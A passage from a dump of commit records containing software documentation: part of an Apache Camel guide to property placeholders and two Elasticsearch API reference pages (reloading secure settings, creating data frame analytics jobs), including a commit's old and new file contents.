persistent-id=\"camel.blueprint\">\n <!-- list some properties as needed -->\n <cm:default-properties>\n <cm:property name=\"prefix.result\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n <\/cm:property-placeholder>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <!-- using Camel properties component and refer to the blueprint property placeholder by its id -->\n <propertyPlaceholder id=\"properties\" location=\"blueprint:myblueprint.placeholder\"\/>\n\n <!-- in the route we can use {{ }} placeholders which will lookup in blueprint -->\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"mock:foo\"\/>\n <to uri=\"{{prefix.result}}\"\/>\n <\/route>\n <\/camelContext>\n<\/blueprint>\n----\n\n\n== Explicit referring to a OSGi blueprint placeholder in Camel\n\nNotice how we use the `blueprint` scheme to refer to the OSGi blueprint\nplaceholder by its id. This allows you to mix and match, for example you\ncan also have additional schemes in the location. For example to load a\nfile from the classpath you can do:\n\n[source]\n----\nlocation=\"blueprint:myblueprint.placeholder,classpath:myproperties.properties\"\n----\n\nEach location is separated by comma.\n\n== Overriding Blueprint property placeholders outside CamelContext\n\nWhen using Blueprint property placeholder in the Blueprint XML file, you\ncan declare the properties directly in the XML file as shown below:\n\n[source,xml]\n----\n<!-- blueprint property placeholders -->\n<cm:property-placeholder persistent-id=\"my-placeholders\" update-strategy=\"reload\">\n <cm:default-properties>\n <cm:property name=\"greeting\" value=\"Hello\"\/>\n <cm:property name=\"destination\" value=\"mock:result\"\/>\n <\/cm:default-properties>\n<\/cm:property-placeholder>\n\n<!-- a bean that uses a blueprint property placeholder -->\n<bean id=\"myCoolBean\" class=\"org.apache.camel.test.blueprint.MyCoolBean\">\n <property name=\"say\" value=\"${greeting}\"\/>\n<\/bean>\n\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n\n <route>\n <from uri=\"direct:start\"\/>\n <bean ref=\"myCoolBean\" method=\"saySomething\"\/>\n <to uri=\"{{destination}}\"\/>\n <\/route>\n\n<\/camelContext>\n----\n\nNotice that we have a `<bean>` which refers to one of the properties. And\nin the Camel route we refer to the other using the `{{` and `}}` notation.\n\nNow if you want to override these Blueprint properties from an unit\ntest, you can do this as shown below:\n\n[source,java]\n----\nprotected String useOverridePropertiesWithConfigAdmin(Dictionary props) {\n \/\/ add the properties we want to override\n props.put(\"greeting\", \"Bye\");\n\n \/\/ return the PID of the config-admin we are using in the blueprint xml file\n return \"my-placeholders\";\n}\n----\n\nTo do this we override and implement the\n`useOverridePropertiesWithConfigAdmin` method. We can then put the\nproperties we want to override on the given props parameter. And the\nreturn value *must* be the `persistence-id` of the\n`<cm:property-placeholder>` tag, which you define in the blueprint XML\nfile.\n\n== Using .cfg or .properties file for Blueprint property placeholders\n\nWhen using Blueprint property placeholder in the Blueprint XML file, you\ncan declare the properties in a `.properties` or `.cfg` file. If you use\nApache ServieMix \/ Karaf then this container has a convention that it\nloads the properties from a file in the etc directory with the naming\n`etc\/pid.cfg`, where `pid` is the `persistence-id`.\n\nFor example in the blueprint XML file we have the\n`persistence-id=\"stuff\"`, which mean it will load the configuration file\nas `etc\/stuff.cfg`.\n\nNow if you want to unit test this blueprint XML file, then you can\noverride the `loadConfigAdminConfigurationFile` and tell Camel which\nfile to load as shown below:\n\n[source,java]\n----\n@Override\nprotected String[] loadConfigAdminConfigurationFile() {\n \/\/ String[0] = tell Camel the path of the .cfg file to use for OSGi ConfigAdmin in the blueprint XML file\n \/\/ String[1] = tell Camel the persistence-id of the cm:property-placeholder in the blueprint XML file\n return new String[]{\"src\/test\/resources\/etc\/stuff.cfg\", \"stuff\"};\n}\n----\n\nNotice that this method requires to return a `String[]` with 2 values. The\n1st value is the path for the configuration file to load.\nThe 2nd value is the `persistence-id` of the `<cm:property-placeholder>`\ntag.\n\nThe `stuff.cfg` file is just a plain properties file with the property\nplaceholders such as:\n\n[source]\n----\n== this is a comment\ngreeting=Bye\n----\n\n== Using .cfg file and overriding properties for Blueprint property placeholders\n\nYou can do both as well. Here is a complete example. First we have the\nBlueprint XML file:\n\nAnd in the unit test class we do as follows:\n\nAnd the `etc\/stuff.cfg` configuration file contains\n\n[source]\n----\ngreeting=Bye\necho=Yay\ndestination=mock:result\n----\n\n== Bridging Spring and Camel property placeholders\n\nThe Spring Framework does not allow 3rd party frameworks such as Apache\nCamel to seamless hook into the Spring property placeholder mechanism.\nHowever you can easily bridge Spring and Camel by declaring a Spring\nbean with the type\n`org.apache.camel.spring.spi.BridgePropertyPlaceholderConfigurer`, which\nis a Spring\n`org.springframework.beans.factory.config.PropertyPlaceholderConfigurer`\ntype.\n\nTo bridge Spring and Camel you must define a single bean as shown below:\n\n*Bridging Spring and Camel property placeholders*\n\nYou *must not* use the spring <context:property-placeholder> namespace\nat the same time; this is not possible.\n\nAfter declaring this bean, you can define property placeholders using\nboth the Spring style, and the Camel style within the <camelContext> tag\nas shown below:\n\n*Using bridge property placeholders*\n\nNotice how the hello bean is using pure Spring property placeholders\nusing the `${ }` notation. And in the Camel routes we use the Camel\nplaceholder notation with `{{` and `}}`.\n\n== Clashing Spring property placeholders with Camels Simple language\n\nTake notice when using Spring bridging placeholder then the spring `${ }`\nsyntax clashes with the xref:languages:simple-language.adoc[Simple] in Camel, and therefore\ntake care. For example:\n\n[source,xml]\n----\n<setHeader name=\"Exchange.FILE_NAME\">\n <simple>{{file.rootdir}}\/${in.header.CamelFileName}<\/simple>\n<\/setHeader>\n----\n\nclashes with Spring property placeholders, and you should use `$simple{ }`\nto indicate using the xref:languages:simple-language.adoc[Simple] language in Camel.\n\n[source,xml]\n----\n<setHeader name=\"Exchange.FILE_NAME\">\n <simple>{{file.rootdir}}\/$simple{in.header.CamelFileName}<\/simple>\n<\/setHeader>\n----\n\nAn alternative is to configure the `PropertyPlaceholderConfigurer` with\n`ignoreUnresolvablePlaceholders` option to `true`.\n\n== Overriding properties from Camel test kit\n\nWhen Testing with Camel and using the\nxref:properties-component.adoc[Properties] component, you may want to be able to\nprovide the properties to be used from directly within the unit test\nsource code. +\nCamel test kits, eg `CamelTestSupport` class offers the following methods\n\n* `useOverridePropertiesWithPropertiesComponent`\n* `ignoreMissingLocationWithPropertiesComponent`\n\nSo for example in your unit test classes, you can override the\n`useOverridePropertiesWithPropertiesComponent` method and return a\n`java.util.Properties` that contains the properties which should be\npreferred to be used.\n\n=== Providing properties from within unit test source\n\nThis can be done from any of the Camel Test kits, such as camel-test,\ncamel-test-spring, and camel-test-blueprint.\n\nThe `ignoreMissingLocationWithPropertiesComponent` can be used to\ninstruct Camel to ignore any locations which was not discoverable, for\nexample if you run the unit test, in an environment that does not have\naccess to the location of the properties.\n\n== Using @PropertyInject\n\nCamel allows to inject property placeholders in POJOs using the\n`@PropertyInject` annotation which can be set on fields and setter\nmethods.\n\nFor example you can use that with `RouteBuilder` classes, such as shown\nbelow:\n\n[source,java]\n----\npublic class MyRouteBuilder extends RouteBuilder {\n\n @PropertyInject(\"hello\")\n private String greeting;\n\n @Override\n public void configure() throws Exception {\n from(\"direct:start\")\n .transform().constant(greeting)\n .to(\"{{result}}\");\n }\n\n}\n----\n\nNotice we have annotated the greeting field with `@PropertyInject` and\ndefine it to use the key `\"hello\"`. Camel will then lookup the property\nwith this key and inject its value, converted to a String type.\n\nYou can also use multiple placeholders and text in the key, for example\nwe can do:\n\n[source,java]\n----\n@PropertyInject(\"Hello {{name}} how are you?\")\nprivate String greeting;\n----\n\nThis will lookup the placeholder with they key `\"name\"`.\n\nYou can also add a default value if the key does not exists, such as:\n\n[source,java]\n----\n@PropertyInject(value = \"myTimeout\", defaultValue = \"5000\")\nprivate int timeout;\n----\n\n== Using out of the box functions\n\nThe xref:properties-component.adoc[Properties] component includes the following\nfunctions out of the box\n\n* `env` - A function to lookup the property from OS environment variables\n* `sys` - A function to lookup the property from Java JVM system\nproperties\n* `service` - A function to lookup the property from OS environment\nvariables using the service naming idiom\n* `service.name` - A function to lookup the\nproperty from OS environment variables using the service naming idiom\nreturning the hostname part only\n* `service.port` - A function to lookup the\nproperty from OS environment variables using the service naming idiom\nreturning the port part only\n\nAs you can see these functions is intended to make it easy to lookup\nvalues from the environment. As they are provided out of the box, they\ncan easily be used as shown below:\n\n[source,xml]\n----\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{env:SOMENAME}`}\"\/>\n <to uri=\"{`{sys:MyJvmPropertyName}`}\"\/>\n <\/route>\n <\/camelContext>\n----\n\nYou can use default values as well, so if the property does not exists,\nyou can define a default value as shown below, where the default value\nis a `log:foo` and `log:bar` value.\n\n[source,xml]\n----\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{env:SOMENAME:log:foo}`}\"\/>\n <to uri=\"{`{sys:MyJvmPropertyName:log:bar}`}\"\/>\n <\/route>\n <\/camelContext>\n----\n\nThe service function is for looking up a service which is defined using\nOS environment variables using the service naming idiom, to refer to a\nservice location using `hostname : port`\n\n* __NAME__**_SERVICE_HOST**\n* __NAME__**_SERVICE_PORT**\n\nin other words the service uses `_SERVICE_HOST` and `_SERVICE_PORT` as\nprefix. So if the service is named FOO, then the OS environment\nvariables should be set as\n\n[source]\n----\nexport $FOO_SERVICE_HOST=myserver\nexport $FOO_SERVICE_PORT=8888\n----\n\nFor example if the FOO service a remote HTTP service, then we can refer\nto the service in the Camel endpoint uri, and use\nthe HTTP component to make the HTTP call:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"http:\/\/{`{service:FOO}`}\/myapp\"\/>\n <\/route>\n<\/camelContext>\n----\n\nAnd we can use default values if the service has not been defined, for\nexample to call a service on localhost, maybe for unit testing etc\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"http:\/\/{`{service:FOO:localhost:8080}`}\/myapp\"\/>\n <\/route>\n<\/camelContext>\n----\n\n== Using custom functions (advanced)\n\nThe xref:properties-component.adoc[Properties] component allow to plugin 3rd party\nfunctions which can be used during parsing of the property placeholders.\nThese functions are then able to do custom logic to resolve the\nplaceholders, such as looking up in databases, do custom computations,\nor whatnot. The name of the function becomes the prefix used in the\nplaceholder. This is best illustrated in the example code below\n\n[source,xml]\n----\n<bean id=\"beerFunction\" class=\"MyBeerFunction\"\/>\n\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <propertyPlaceholder id=\"properties\">\n <propertiesFunction ref=\"beerFunction\"\/>\n <\/propertyPlaceholder>\n\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{`{beer:FOO}`}\"\/>\n <to uri=\"{`{beer:BAR}`}\"\/>\n <\/route>\n<\/camelContext>\n----\n\n[NOTE]\n====\nThe location attribute (on propertyPlaceholder tag) is not mandatory\n====\n\nHere we have a Camel XML route where we have defined the\n`<propertyPlaceholder>` to use a custom function, which we refer to be the\nbean id - eg the `beerFunction`. As the beer function uses `\"beer\"` as its\nname, then the placeholder syntax can trigger the beer function by\nstarting with `beer:value`.\n\nThe implementation of the function is only two methods as shown below:\n\n[source,java]\n----\npublic static final class MyBeerFunction implements PropertiesFunction {\n\n @Override\n public String getName() {\n return \"beer\";\n }\n\n @Override\n public String apply(String remainder) {\n return \"mock:\" + remainder.toLowerCase();\n }\n}\n----\n\nThe function must implement\nthe `org.apache.camel.component.properties.PropertiesFunction`\ninterface. The method `getName` is the name of the function, eg beer.\nAnd the `apply` method is where we implement the custom logic to do. As\nthe sample code is from an unit test, it just returns a value to refer\nto a mock endpoint.\n\nTo register a custom function from Java code is as shown below:\n\n[source,java]\n----\nPropertiesComponent pc = (org.apache.camel.componennt.properties.PropertiesComponent) context.getPropertiesComponent();\npc.addFunction(new MyBeerFunction());\n----\n\n\n== Using 3rd-party properties sources\n\nThe properties component allows to plugin 3rd party sources to load and lookup properties via the `PropertySource`\nAPI from camel-api. For example the `camel-microprofile-config` component is implemented using this.\nThe 3rd-party `PropertySource` can automatic be discoverd from classpath when Camel is starting up.\nThis is done by include the file `META-INF\/services\/org\/apache\/camel\/property-source-factory` file\nwhich refers to the fully qualified class name of the `PropertySource` implementation.\nSee the `camel-microprofile-config` for an example.\n\nYou can also register 3rd-part property sources via Java API\n\n[source,java]\n----\nPropertiesComponent pc = ...\npc.addPropertySource(myPropertySource);\n----\n\n=== LoadablePropertySource\n\nA `PropertySource` can define that it supports loading all its properties from the source at once,\nfor example from file system. This allows Camel properties component to load these properties at once\nduring startup.\n\n=== PropertySource\n\nThe regular `PropertySource` will lookup the property on-demand, for example to lookup\nvalues from a backend source such as a database or HashiCorp Vault etc.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c00a982be3e9cfe6ddf4c7b3aea181524c99a45","subject":"Docs fix node_id spec for secure settings reload API (#55712)","message":"Docs fix node_id spec for secure settings reload API (#55712)\n\nFix docs typo for the `node_id` parameter in the secure settings reload API.","repos":"nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/cluster\/nodes-reload-secure-settings.asciidoc","new_file":"docs\/reference\/cluster\/nodes-reload-secure-settings.asciidoc","new_contents":"[[cluster-nodes-reload-secure-settings]]\n=== Nodes reload secure settings API\n++++\n<titleabbrev>Nodes reload secure settings<\/titleabbrev>\n++++\n\nReloads the keystore on nodes in the cluster.\n\n[[cluster-nodes-reload-secure-settings-api-request]]\n==== {api-request-title}\n\n`POST _nodes\/reload_secure_settings` +\n`POST _nodes\/<node_id>\/reload_secure_settings`\n\n[[cluster-nodes-reload-secure-settings-api-desc]]\n==== {api-description-title}\n\n<<secure-settings,Secure settings>> are stored in an on-disk keystore. Certain\nof these settings are <<reloadable-secure-settings,reloadable>>. That is, you\ncan change them on disk and reload them without restarting any nodes in the\ncluster. When you have updated reloadable secure settings in your keystore, you\ncan use this API to reload those settings on each node.\n\nWhen the {es} keystore is password protected and not simply obfuscated, you must\nprovide the password for the keystore when you reload the secure settings.\nReloading the settings for the whole cluster assumes that all nodes' keystores\nare protected with the same password; this method is allowed only when\n<<tls-transport,inter-node communications are encrypted>>. Alternatively, you can\nreload the secure settings on each node by locally accessing the API and passing\nthe node-specific {es} keystore password.\n\n[[cluster-nodes-reload-secure-settings-path-params]]\n==== {api-path-parms-title}\n\n`<node_id>`::\n (Optional, string) The names of particular nodes in the cluster to target.\n For example, `nodeId1,nodeId2`. For node selection options, see\n <<cluster-nodes>>.\n\nNOTE: {es} requires consistent secure settings across the cluster nodes, but\nthis consistency is not enforced. Hence, reloading specific nodes is not\nstandard. It is justifiable only when retrying failed reload operations.\n\n[[cluster-nodes-reload-secure-settings-api-request-body]]\n==== {api-request-body-title}\n\n`secure_settings_password`::\n (Optional, string) The password for the {es} keystore.\n\n[[cluster-nodes-reload-secure-settings-api-example]]\n==== {api-examples-title}\n\nThe following examples assume a common password for the {es} keystore on every\nnode of the cluster:\n\n[source,console]\n--------------------------------------------------\nPOST _nodes\/reload_secure_settings\n{\n \"secure_settings_password\":\"s3cr3t\"\n}\nPOST _nodes\/nodeId1,nodeId2\/reload_secure_settings\n{\n \"secure_settings_password\":\"s3cr3t\"\n}\n--------------------------------------------------\n\/\/ TEST[setup:node]\n\/\/ TEST[s\/nodeId1,nodeId2\/*\/]\n\nThe response contains the `nodes` object, which is a map, keyed by the\nnode id. Each value has the node `name` and an optional `reload_exception`\nfield. The `reload_exception` field is a serialization of the exception\nthat was thrown during the reload process, if any.\n\n[source,console-result]\n--------------------------------------------------\n{\n \"_nodes\": {\n \"total\": 1,\n \"successful\": 1,\n \"failed\": 0\n },\n \"cluster_name\": \"my_cluster\",\n \"nodes\": {\n \"pQHNt5rXTTWNvUgOrdynKg\": {\n \"name\": \"node-0\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"my_cluster\"\/$body.cluster_name\/]\n\/\/ TESTRESPONSE[s\/\"pQHNt5rXTTWNvUgOrdynKg\"\/\\$node_name\/]\n","old_contents":"[[cluster-nodes-reload-secure-settings]]\n=== Nodes reload secure settings API\n++++\n<titleabbrev>Nodes reload secure settings<\/titleabbrev>\n++++\n\nReloads the keystore on nodes in the cluster.\n\n[[cluster-nodes-reload-secure-settings-api-request]]\n==== {api-request-title}\n\n`POST _nodes\/reload_secure_settings` +\n`POST _nodes\/<nodes\/reload_secure_settings`\n\n[[cluster-nodes-reload-secure-settings-api-desc]]\n==== {api-description-title}\n\n<<secure-settings,Secure settings>> are stored in an on-disk keystore. Certain\nof these settings are <<reloadable-secure-settings,reloadable>>. That is, you\ncan change them on disk and reload them without restarting any nodes in the\ncluster. When you have updated reloadable secure settings in your keystore, you\ncan use this API to reload those settings on each node.\n\nWhen the {es} keystore is password protected and not simply obfuscated, you must\nprovide the password for the keystore when you reload the secure settings.\nReloading the settings for the whole cluster assumes that all nodes' keystores\nare protected with the same password; this method is allowed only when\n<<tls-transport,inter-node communications are encrypted>>. Alternatively, you can\nreload the secure settings on each node by locally accessing the API and passing\nthe node-specific {es} keystore password.\n\n[[cluster-nodes-reload-secure-settings-path-params]]\n==== {api-path-parms-title}\n\n`<nodes>`::\n (Optional, string) The names of particular nodes in the cluster to target.\n For example, `nodeId1,nodeId2`. For node selection options, see\n <<cluster-nodes>>.\n\nNOTE: {es} requires consistent secure settings across the cluster nodes, but\nthis consistency is not enforced. Hence, reloading specific nodes is not\nstandard. It is justifiable only when retrying failed reload operations.\n\n[[cluster-nodes-reload-secure-settings-api-request-body]]\n==== {api-request-body-title}\n\n`secure_settings_password`::\n (Optional, string) The password for the {es} keystore.\n\n[[cluster-nodes-reload-secure-settings-api-example]]\n==== {api-examples-title}\n\nThe following examples assume a common password for the {es} keystore on every\nnode of the cluster:\n\n[source,console]\n--------------------------------------------------\nPOST _nodes\/reload_secure_settings\n{\n \"secure_settings_password\":\"s3cr3t\"\n}\nPOST _nodes\/nodeId1,nodeId2\/reload_secure_settings\n{\n \"secure_settings_password\":\"s3cr3t\"\n}\n--------------------------------------------------\n\/\/ TEST[setup:node]\n\/\/ TEST[s\/nodeId1,nodeId2\/*\/]\n\nThe response contains the `nodes` object, which is a map, keyed by the\nnode id. Each value has the node `name` and an optional `reload_exception`\nfield. The `reload_exception` field is a serialization of the exception\nthat was thrown during the reload process, if any.\n\n[source,console-result]\n--------------------------------------------------\n{\n \"_nodes\": {\n \"total\": 1,\n \"successful\": 1,\n \"failed\": 0\n },\n \"cluster_name\": \"my_cluster\",\n \"nodes\": {\n \"pQHNt5rXTTWNvUgOrdynKg\": {\n \"name\": \"node-0\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"my_cluster\"\/$body.cluster_name\/]\n\/\/ TESTRESPONSE[s\/\"pQHNt5rXTTWNvUgOrdynKg\"\/\\$node_name\/]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c355fea8f4f5937d2066bff58f08477180549e5e","subject":"[DOCS] Remove text fields from classification dependent variables (#54849)","message":"[DOCS] Remove text fields from classification dependent variables (#54849)\n\n","repos":"robin13\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/ml\/df-analytics\/apis\/put-dfanalytics.asciidoc","new_file":"docs\/reference\/ml\/df-analytics\/apis\/put-dfanalytics.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"platinum\"]\n[[put-dfanalytics]]\n=== Create {dfanalytics-jobs} API\n[subs=\"attributes\"]\n++++\n<titleabbrev>Create {dfanalytics-jobs}<\/titleabbrev>\n++++\n\nInstantiates a {dfanalytics-job}.\n\nexperimental[]\n\n[[ml-put-dfanalytics-request]]\n==== {api-request-title}\n\n`PUT _ml\/data_frame\/analytics\/<data_frame_analytics_id>`\n\n\n[[ml-put-dfanalytics-prereq]]\n==== {api-prereq-title}\n\nIf the {es} {security-features} are enabled, you must have the following \nbuilt-in roles and privileges:\n\n* `machine_learning_admin`\n* `kibana_admin` (UI only)\n\n\n* source index: `read`, `view_index_metadata`\n* destination index: `read`, `create_index`, `manage` and `index`\n* cluster: `monitor` (UI only)\n \nFor more information, see <<security-privileges>> and <<built-in-roles>>.\n\n+\n--\nNOTE: It is possible that secondary authorization headers are supplied in the\nrequest. If this is the case, the secondary authorization headers are used\ninstead of the primary headers.\n--\n\n[[ml-put-dfanalytics-desc]]\n==== {api-description-title}\n\nThis API creates a {dfanalytics-job} that performs an analysis on the source \nindex and stores the outcome in a destination index.\n\nThe destination index will be automatically created if it does not exist. The \n`index.number_of_shards` and `index.number_of_replicas` settings of the source \nindex will be copied over the destination index. When the source index matches \nmultiple indices, these settings will be set to the maximum values found in the \nsource indices.\n\nThe mappings of the source indices are also attempted to be copied over\nto the destination index, however, if the mappings of any of the fields don't \nmatch among the source indices, the attempt will fail with an error message.\n\nIf the destination index already exists, then it will be use as is. This makes \nit possible to set up the destination index in advance with custom settings \nand mappings.\n\n[discrete]\n[[ml-hyperparam-optimization]]\n===== Hyperparameter optimization\n\nIf you don't supply {regression} or {classification} parameters, _hyperparameter \noptimization_ occurs, which sets a value for the undefined parameters. The\nstarting point is calculated for data dependent parameters by examining the loss\non the training data. Subject to the size constraint, this operation provides an\nupper bound on the improvement in validation loss.\n\nA fixed number of rounds is used for optimization which depends on the number of \nparameters being optimized. The optimization starts with random search, then \nBayesian optimization is performed that is targeting maximum expected \nimprovement. If you override any parameters by explicitely setting it, the \noptimization calculates the value of the remaining parameters accordingly and \nuses the value you provided for the overridden parameter. The number of rounds \nare reduced respectively. The validation error is estimated in each round by \nusing 4-fold cross validation.\n\n[[ml-put-dfanalytics-path-params]]\n==== {api-path-parms-title}\n\n`<data_frame_analytics_id>`::\n(Required, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define]\n\n[role=\"child_attributes\"]\n[[ml-put-dfanalytics-request-body]]\n==== {api-request-body-title}\n\n`allow_lazy_start`::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=allow-lazy-start]\n\n\/\/Begin analysis\n`analysis`::\n(Required, object)\nThe analysis configuration, which contains the information necessary to perform\none of the following types of analysis: {classification}, {oldetection}, or\n{regression}.\n+\n.Properties of `analysis`\n[%collapsible%open]\n====\n\/\/Begin classification\n`classification`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-classification.html[{classification}].\n+\nTIP: Advanced parameters are for fine-tuning {classanalysis}. They are set \nautomatically by <<ml-hyperparam-optimization,hyperparameter optimization>> \nto give minimum validation error. It is highly recommended to use the default \nvalues unless you fully understand the function of these parameters.\n+\n.Properties of `classification`\n[%collapsible%open]\n=====\n`class_assignment_objective`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=class-assignment-objective]\n\n`dependent_variable`::::\n(Required, string)\n+\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dependent-variable]\n+\nThe data type of the field must be numeric (`integer`, `short`, `long`, `byte`), \ncategorical (`ip` or `keyword`), or boolean.\n\n`eta`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`feature_bag_fraction`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_trees`::::\n(Optional, integer) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_top_classes`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=num-top-classes]\n\n`num_top_feature_importance_values`::::\n(Optional, integer)\nAdvanced configuration option. Specifies the maximum number of\n{ml-docs}\/dfa-classification.html#dfa-classification-feature-importance[feature\nimportance] values per document to return. By default, it is zero and no feature importance\ncalculation occurs.\n\n`prediction_field_name`::::\n(Optional, string) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=prediction-field-name]\n\n`randomize_seed`::::\n(Optional, long)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=randomize-seed]\n\n`training_percent`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=training-percent]\n\/\/End classification\n=====\n\/\/Begin outlier_detection\n`outlier_detection`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-outlier-detection.html[{oldetection}]:\n+\n.Properties of `outlier_detection`\n[%collapsible%open]\n=====\n`compute_feature_influence`::::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=compute-feature-influence]\n \n`feature_influence_threshold`:::: \n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-influence-threshold]\n\n`method`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=method]\n \n`n_neighbors`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=n-neighbors]\n \n`outlier_fraction`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=outlier-fraction]\n \n`standardization_enabled`::::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=standardization-enabled]\n\/\/End outlier_detection\n=====\n\/\/Begin regression\n`regression`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-regression.html[{regression}].\n+\nTIP: Advanced parameters are for fine-tuning {reganalysis}. They are set \nautomatically by <<ml-hyperparam-optimization,hyperparameter optimization>> \nto give minimum validation error. It is highly recommended to use the default \nvalues unless you fully understand the function of these parameters.\n+\n.Properties of `regression`\n[%collapsible%open]\n=====\n`dependent_variable`::::\n(Required, string)\n+\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dependent-variable]\n+\nThe data type of the field must be numeric.\n\n`eta`::::\n(Optional, double)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`feature_bag_fraction`::::\n(Optional, double)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_trees`::::\n(Optional, integer) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_top_feature_importance_values`::::\n(Optional, integer)\nAdvanced configuration option. Specifies the maximum number of\n{ml-docs}\/dfa-regression.html#dfa-regression-feature-importance[feature importance] \nvalues per document to return. By default, it is zero and no feature importance\ncalculation occurs.\n\n`prediction_field_name`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=prediction-field-name]\n\n`randomize_seed`::::\n(Optional, long)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=randomize-seed]\n\n`training_percent`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=training-percent]\n=====\n\/\/End regression\n====\n\/\/End analysis\n\n\/\/Begin analyzed_fields\n`analyzed_fields`::\n(Optional, object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields]\n+\n.Properties of `analyzed_fields`\n[%collapsible%open]\n====\n`excludes`:::\n(Optional, array)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields-excludes]\n\n`includes`:::\n(Optional, array)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields-includes]\n\/\/End analyzed_fields\n====\n\n`description`::\n(Optional, 